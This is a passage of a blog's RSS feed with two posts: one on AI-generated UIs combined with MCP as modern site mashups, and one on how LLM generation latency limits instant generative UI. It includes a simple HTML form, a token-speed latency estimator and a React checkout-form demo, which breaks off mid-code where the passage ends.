&lt;p>Combining this with &lt;a href="https://en.wikipedia.org/wiki/Model_Context_Protocol">Model Context Protocol (MCP)&lt;/a> has got me thinking about the good old &lt;a href="https://en.wikipedia.org/wiki/Mashup_(web_application_hybrid)">site mashups&lt;/a>, and how AI agents can unleash a new, modernized version of them. If you haven&amp;rsquo;t heard about mashups before, here&amp;rsquo;s what Gemini has to say about them:&lt;/p></description><content:encoded><![CDATA[<p><a href="https://aifoc.us/latency/">Paul Kinlan recently wrote</a> about how latency of AI models to generate UIs with HTML, CSS and JavaScript is decreasing significantly, and how that can lead to user UIs that are ephemeral, dynamically generated, and specialized to the user need at hand.</p>
<blockquote>
<p>To me, the direction of travel is clear. UI generation to service user-goals is going to happen.</p></blockquote>
<p>Combining this with <a href="https://en.wikipedia.org/wiki/Model_Context_Protocol">Model Context Protocol (MCP)</a> has got me thinking about the good old <a href="https://en.wikipedia.org/wiki/Mashup_(web_application_hybrid)">site mashups</a>, and how AI agents can unleash a new, modernized version of them. If you haven&rsquo;t heard about mashups before, here&rsquo;s what Gemini has to say about them:</p>
<blockquote>
<p>A site mashup combines data, functionalities, or applications from two or more distinct web sources into a single, integrated user experience. This is typically achieved by leveraging publicly available APIs (Application Programming Interfaces) or RSS feeds, allowing developers to extract and re-present content in a new and innovative way, often without owning the original data sources. For example, a real estate mashup might combine map data from Google Maps with property listings from a real estate website to visually display homes for sale in a specific area.</p></blockquote>
<p>One of the challenges with site mashups was that, while combining functionality from different sites led to unique experiences, those were also frequently niche, sometimes specific to individuals, and the effort to build them meant they would rarely pay off beyond developers building toy applications for themselves.</p>
<p>AI models solve this particular problem by removing the need for a developer to create the UI, and MCP servers provide a standardized description of APIs that AI Agents can call or use in the application they are building.</p>
<p>The ability of AI Agents to use tools, standardized with the MCP protocol, allows AI Agents to integrate services into the conversation with the user. However, many user interactions don&rsquo;t work well in a chat interface, and having a UI can be a better way to show structured information or ask for user input. That&rsquo;s where mini-apps with dynamic UIs and MCP servers come in.</p>
<p>Imagine planning a holiday trip. The user may want to find a suitable flight and a hotel that matches their preferences, create an itinerary of local attractions with dinner at restaurants that match their taste and, finally, book it all. This usually requires interacting with different services and keeping track of your own itinerary.</p>
<p>An AI agent, through the MCP protocol, can use different sources to check reviews for hotels, attractions and restaurants, check their prices and availability, and finally, create all bookings as needed, taking into account the user&rsquo;s own preferences. In this workflow, some bits of information can work well in a chat interface, like showing the summary of the reviews of a restaurant. Others might work better with a UI, like showing the location of available hotels on a map, or asking the user to pick attractions they are interested in from a list by checking them.</p>
<p>Being able to create UIs dynamically and instantly would allow those integrations to happen with the best UI possible for the task at hand, and aligned with that user&rsquo;s preferences.</p>
<p>It&rsquo;s possible to imagine entire businesses that only provide services via MCP, being effectively UI-less, and relying on AI agents to drive business to them.</p>
<p>While the performance of the current models is incredible, they are not instant (yet), with that being a significant blocker for this kind of mashup.</p>
<p>Another important blocker is figuring out the monetization model for applications providing content to AI Agents. For flight, restaurant, or hotel booking services the benefit is clear, since the AI Agent is directly generating business for them, but services like review sites will need a good way to monetize the content they are providing. Maybe the AI Agent would pay for access to those services on behalf of its user.</p>
]]></content:encoded></item><item><title>latency</title><link>https://aifoc.us/latency/</link><pubDate>Thu, 22 May 2025 19:59:06 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/latency/</guid><description>&lt;p>I spent an &lt;a href="https://paul.kinlan.me/fictitious-web/">evening in a fictitious web&lt;/a>. The faux-browser window hosted at &lt;a href="https://websim.ai/">WebSim.ai&lt;/a> gave me a view into a virtual world that didn&amp;rsquo;t exist, but one that felt like it did. Every page that I visited was created in the moment that I requested it, willed into existence by a generative AI model.&lt;/p>
&lt;p>It was like the early days of the web. Every page felt fresh and unique. Some were high quality, some were low-fi. All were incredibly slow to load. I was on a dial-up connection in 2024. Even when my college&amp;rsquo;s shared connection in &amp;lsquo;98 was on a slow leased line, sites frequently took minutes to load, but at the time it didn&amp;rsquo;t matter, I had this new world to explore.&lt;/p></description><content:encoded><![CDATA[<p>I spent an <a href="https://paul.kinlan.me/fictitious-web/">evening in a fictitious web</a>. The faux-browser window hosted at <a href="https://websim.ai/">WebSim.ai</a> gave me a view into a virtual world that didn&rsquo;t exist, but one that felt like it did. Every page that I visited was created in the moment that I requested it, willed into existence by a generative AI model.</p>
<p>It was like the early days of the web. Every page felt fresh and unique. Some were high quality, some were low-fi. All were incredibly slow to load. I was on a dial-up connection in 2024. Even when my college&rsquo;s shared connection in &lsquo;98 was on a slow leased line, sites frequently took minutes to load, but at the time it didn&rsquo;t matter, I had this new world to explore.</p>
<p>It wasn&rsquo;t until much later in my career that I learned about the importance of latency in web applications. The speed at which a page loads and responds to user interactions can make or break the user experience. In 1993, Jakob Nielsen published his first paper on the topic of response times and how they affect user experience. He identified three key limits for response times:</p>
<blockquote>
<p>0.1 second is about the limit for having the user feel that the system is reacting instantaneously, meaning that no special feedback is necessary except to display the result.</p>
<p>1.0 second is about the limit for the user&rsquo;s flow of thought to stay uninterrupted, even though the user will notice the delay. Normally, no special feedback is necessary during delays of more than 0.1 but less than 1.0 second, but the user does lose the feeling of operating directly on the data.</p>
<p>10 seconds is about the limit for keeping the user&rsquo;s attention focused on the dialogue. For longer delays, users will want to perform other tasks while waiting for the computer to finish, so they should be given feedback indicating when the computer expects to be done. Feedback during the delay is especially important if the response time is likely to be highly variable, since users will then not know what to expect.</p></blockquote>
<p>— <a href="https://www.nngroup.com/articles/response-times-3-important-limits/">Jakob Nielsen - 1993</a></p>
<p>This was written at the dawn of the web and was later <a href="https://www.nngroup.com/articles/response-times-3-important-limits/#:~:text=Web%2DBased%20Application%20Response%20Time">refined in 2014 for web applications</a>. I think it&rsquo;s interesting that streaming of responses has been used as a way to keep people engaged with LLMs. Yes, streaming has been an interesting hack to improve the perception of speed, and yes, fundamentally these models are doing trillions upon trillions of calculations to get us an answer, but it doesn&rsquo;t change the fact that the underlying model is slow to generate the content.</p>
<p>We are in the early days of the web again. The content or the &ldquo;apps&rdquo; are currently slow to generate, and sometimes experiences like those created with the &ldquo;Canvas&rdquo; apps can feel a little low-fi too, but we are in a <a href="/transition/">transition</a>, and because these tools feel valuable we are happy to put up with the latency to get a complete response. Seeing these responses generate and stream in feels like the progressive loading of HTML on a slow connection, when you could see the page UI progressively load and JPEGs slowly unblur into full view. It seems to me that we are in the modem phase right now, waiting for the broadband transition to happen.</p>
<p>It&rsquo;s not clear to me that the current &ldquo;chat&rdquo; interfaces are <em>the</em> future (it can be tiring to engage when all I want to do is prod buttons and swipe on things). I&rsquo;d argue that if the future of computing is through tools like LLMs, be it a <a href="/superapps/">superapp</a> or any existing app, chewing through arbitrary tasks that the user requests, we are going to need goal-based generative UI.</p>
<p>Ben Thompson has frequently noted that if there is to be a future in VR/XR-based experiences, then given the sheer amount of content that needs to be created and the complexity of creating it, there will need to be a massive shift to systems that generate UI to service a user&rsquo;s need based on context and intent.</p>
<blockquote>
<p>AI, however, will enable generative UI, where you are only presented with the appropriate UI to accomplish the specific task at hand. This will be somewhat useful on phones, and much more compelling on something like a smartwatch; instead of having to craft an interface for a tiny screen, generative UIs will surface exactly what you need when you need it, and nothing else.</p>
<p>Where this will really make a difference is with hardware like Orion. Smartphone UI’s will be clunky and annoying in augmented reality; the magic isn’t in being pixel perfect, but rather being able to do something with zero friction. Generative UI will make this possible: you’ll only see what you need to see, and be able to interact with it via neural interfaces like the Orion neural wristband. Oh, and this applies to ads as well: everything in the world will be potential inventory.</p></blockquote>
<p>— <a href="https://stratechery.com/2024/metas-ai-abundance/#:~:text=AI%2C%20however%2C%20will,be%20potential%20inventory.">Ben Thompson - Stratechery - Meta&rsquo;s AI Abundance, October 2024</a></p>
<p>Last year, I wrote a little experiment for goal-based UI generation using the <a href="https://paul.kinlan.me/projects/reactive-prompts">reactive-prompts</a> library. Given a goal and the data that you already have to solve that goal, it would create a user interface that captures the rest of the information. I was surprised that even 12 months ago it was possible to generate UIs for simple data-collection goals.</p>
<p>Data collection feels like a good first step for LLMs because we don&rsquo;t need full applications to get a job done, and the parameters seem to be more easily knowable to our tools. It raises a fundamental question: the concept of an application as we know it today might not exist in the future, given that Chain of Thought tools are breaking down a goal (an app in the old context) into finite tasks and then only requiring intervention when they can&rsquo;t progress.</p>
<p>Today, these UIs can take many seconds to create, and because of the progressive nature of HTML, you can see the UI incrementally load. This might be ok, given that people seem quite happy to wait while the models &ldquo;think&rdquo; or stream their response, but we will see a step-change in engagement and interaction when these UIs start getting to Jakob Nielsen&rsquo;s thresholds for interaction.</p>
<p>Ben Thompson also noted in &lsquo;Sora, Groq and Virtual Reality&rsquo; <em>&quot;<a href="https://stratechery.com/2024/sora-groq-and-virtual-reality/#:~:text=which%20means%20the%20speed%20of%20token%20calculation%20is%20at%20an%20absolute%20premium">which means the speed of token calculation is at an absolute premium.</a>&quot;</em> 100%. How far away are we from getting truly instant UIs generated?</p>
<p>Naively, you have to generate HTML, CSS and JS. <a href="https://npmjs.org/package/tcnt">Estimating the number of tokens generated via tcnt</a>, the following form comes to 251 tokens.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">form</span>&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;name&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">button</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;submit&#34;</span>&gt;Submit&lt;/<span style="color:#f92672">button</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">form</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">script</span>&gt;
</span></span><span style="display:flex;"><span>  document.<span style="color:#a6e22e">querySelector</span>(<span style="color:#e6db74">&#34;form&#34;</span>).<span style="color:#a6e22e">addEventListener</span>(<span style="color:#e6db74">&#34;submit&#34;</span>, (<span style="color:#a6e22e">e</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">preventDefault</span>();
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">target</span>.<span style="color:#a6e22e">name</span>.<span style="color:#a6e22e">value</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">email</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">target</span>.<span style="color:#a6e22e">email</span>.<span style="color:#a6e22e">value</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#a6e22e">name</span>, <span style="color:#a6e22e">email</span>);
</span></span><span style="display:flex;"><span>  });
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">script</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">style</span>&gt;
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">form</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">display</span>: <span style="color:#66d9ef">flex</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">flex-direction</span>: <span style="color:#66d9ef">column</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">input</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">margin-bottom</span>: <span style="color:#ae81ff">10</span><span style="color:#66d9ef">px</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">button</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">background-color</span>: <span style="color:#66d9ef">blue</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">color</span>: <span style="color:#66d9ef">white</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">border</span>: <span style="color:#66d9ef">none</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">padding</span>: <span style="color:#ae81ff">10</span><span style="color:#66d9ef">px</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">cursor</span>: <span style="color:#66d9ef">pointer</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">button</span>:<span style="color:#a6e22e">hover</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">background-color</span>: <span style="color:#66d9ef">darkblue</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">style</span>&gt;
</span></span></code></pre></div><p>I found this <a href="https://github.com/coder543/llm-speed-benchmark/blob/main/results/README.md">LLM speed benchmark</a> to be a good indicative reference for the current state of play. Speeds range from 50 tokens per second for the slower but higher quality models to 350 tokens per second for the faster, potentially lower quality models. Obviously a lot has changed since 2024, but the order of magnitude is the same.</p>
<p>My first reaction (and probably yours) is &ldquo;Hey, it should only take 1 second to generate that form&hellip; what&rsquo;s the problem?&rdquo;</p>
<p>But this is not a realistic example because it was hand-crafted by me for a contrived scenario. When building UI with a prompt, there are a number of other things we have to consider:</p>
<ol>
<li>What is the prompt? We have to include the prompt in the token count and processing time.</li>
<li>Is there &ldquo;thinking&rdquo; required, or is there error correction required? This is a non-linear process and can take a long time to get right.</li>
<li>The latency induced by the network request. Setting up a TLS connection can take 200ms.</li>
</ol>
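<p>To put rough numbers on the points above, here is a minimal back-of-the-envelope sketch. The function and parameter names are hypothetical, and it assumes that &ldquo;thinking&rdquo; tokens are generated at the same rate as output tokens and that prompt processing can be folded into a single fixed cost. The 251 tokens, the 50 to 350 tokens per second range and the 200ms connection setup are the figures already mentioned in this post.</p>

```javascript
// Rough latency estimate for generating a UI with an LLM.
// Every name here is hypothetical; this is a sketch, not a benchmark.
function estimateSeconds({
  outputTokens,        // tokens in the generated HTML/CSS/JS
  tokensPerSecond,     // model generation speed
  thinkingTokens = 0,  // assumed to be generated at the same speed as output
  promptSeconds = 0,   // assumed fixed cost to process the prompt
  networkSetupMs = 0,  // e.g. TLS connection setup
}) {
  const generationSeconds = (outputTokens + thinkingTokens) / tokensPerSecond;
  return networkSetupMs / 1000 + promptSeconds + generationSeconds;
}

// The 251-token form, at both ends of the benchmark range.
const slow = estimateSeconds({ outputTokens: 251, tokensPerSecond: 50, networkSetupMs: 200 });
const fast = estimateSeconds({ outputTokens: 251, tokensPerSecond: 350, networkSetupMs: 200 });

console.log(slow.toFixed(2)); // 5.22
console.log(fast.toFixed(2)); // 0.92
```

<p>Even for the tiny form, only the fastest models land near the 1.0 second limit, and that is before any prompt processing or &ldquo;thinking&rdquo; is added.</p>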
<p>A more realistic scenario might be a checkout form with a number of items pre-populated, where you need to get the user&rsquo;s confirmation for a purchase.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-react" data-lang="react"><span style="display:flex;"><span><span style="color:#66d9ef">import</span> <span style="color:#a6e22e">React</span>, { <span style="color:#a6e22e">useState</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#34;react&#34;</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Main App component
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">App</span> <span style="color:#f92672">=</span> () =&gt; {
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// State for form fields
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> [<span style="color:#a6e22e">formData</span>, <span style="color:#a6e22e">setFormData</span>] <span style="color:#f92672">=</span> <span style="color:#a6e22e">useState</span>({
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fullName</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">email</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">address</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">city</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">zip</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">cardNumber</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">expiryDate</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">cvv</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>  });
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// State for shopping basket items
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> [<span style="color:#a6e22e">basketItems</span>, <span style="color:#a6e22e">setBasketItems</span>] <span style="color:#f92672">=</span> <span style="color:#a6e22e">useState</span>([
</span></span><span style="display:flex;"><span>    { <span style="color:#a6e22e">id</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1</span>, <span style="color:#a6e22e">name</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;Wireless Headphones&#34;</span>, <span style="color:#a6e22e">price</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">129.99</span>, <span style="color:#a6e22e">quantity</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1</span> },
</span></span><span style="display:flex;"><span>    { <span style="color:#a6e22e">id</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">2</span>, <span style="color:#a6e22e">name</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;Smartwatch&#34;</span>, <span style="color:#a6e22e">price</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">199.99</span>, <span style="color:#a6e22e">quantity</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1</span> },
</span></span><span style="display:flex;"><span>    { <span style="color:#a6e22e">id</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">3</span>, <span style="color:#a6e22e">name</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;Portable Bluetooth Speaker&#34;</span>, <span style="color:#a6e22e">price</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">79.99</span>, <span style="color:#a6e22e">quantity</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1</span> },
</span></span><span style="display:flex;"><span>  ]);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// Handle input changes for form fields
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">handleInputChange</span> <span style="color:#f92672">=</span> (<span style="color:#a6e22e">e</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> { <span style="color:#a6e22e">name</span>, <span style="color:#a6e22e">value</span> } <span style="color:#f92672">=</span> <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">target</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">setFormData</span>({ ...<span style="color:#a6e22e">formData</span>, [<span style="color:#a6e22e">name</span>]<span style="color:#f92672">:</span> <span style="color:#a6e22e">value</span> });
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// Handle deleting an item from the basket
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">handleDeleteItem</span> <span style="color:#f92672">=</span> (<span style="color:#a6e22e">id</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">setBasketItems</span>(<span style="color:#a6e22e">basketItems</span>.<span style="color:#a6e22e">filter</span>((<span style="color:#a6e22e">item</span>) =&gt; <span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">id</span> <span style="color:#f92672">!==</span> <span style="color:#a6e22e">id</span>));
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// Calculate total price of items in the basket
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">calculateTotal</span> <span style="color:#f92672">=</span> () =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">basketItems</span>
</span></span><span style="display:flex;"><span>      .<span style="color:#a6e22e">reduce</span>((<span style="color:#a6e22e">total</span>, <span style="color:#a6e22e">item</span>) =&gt; <span style="color:#a6e22e">total</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">price</span> <span style="color:#f92672">*</span> <span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">quantity</span>, <span style="color:#ae81ff">0</span>)
</span></span><span style="display:flex;"><span>      .<span style="color:#a6e22e">toFixed</span>(<span style="color:#ae81ff">2</span>);
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// Handle checkout button click
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">handleCheckout</span> <span style="color:#f92672">=</span> () =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// In a real application, you would send formData and basketItems to a server
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Checkout initiated!&#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Form Data:&#34;</span>, <span style="color:#a6e22e">formData</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Basket Items:&#34;</span>, <span style="color:#a6e22e">basketItems</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">alert</span>(<span style="color:#e6db74">&#34;Checkout successful! (This is a demo)&#34;</span>); <span style="color:#75715e">// Using alert for demo purposes
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> (
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;min-h-screen bg-gray-100 flex items-center justify-center p-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>      &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;bg-white p-8 rounded-xl shadow-lg w-full max-w-4xl flex flex-col lg:flex-row gap-8&#34;</span>&gt;
</span></span><span style="display:flex;"><span>        {<span style="color:#75715e">/* Customer Information Section */</span>}
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flex-1&#34;</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">h2</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-3xl font-extrabold text-gray-800 mb-6 text-center&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">Checkout</span>
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">h2</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          {<span style="color:#75715e">/* Contact Information */</span>}
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;mb-6&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">h3</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-semibold text-gray-700 mb-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              <span style="color:#a6e22e">Contact</span> <span style="color:#a6e22e">Information</span>
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">h3</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-1 md:grid-cols-2 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;fullName&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">Full</span> <span style="color:#a6e22e">Name</span>
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;fullName&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;fullName&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">fullName</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;John Doe&#34;</span>
</span></span><span style="display:flex;"><span>                /&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">Email</span>
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">email</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
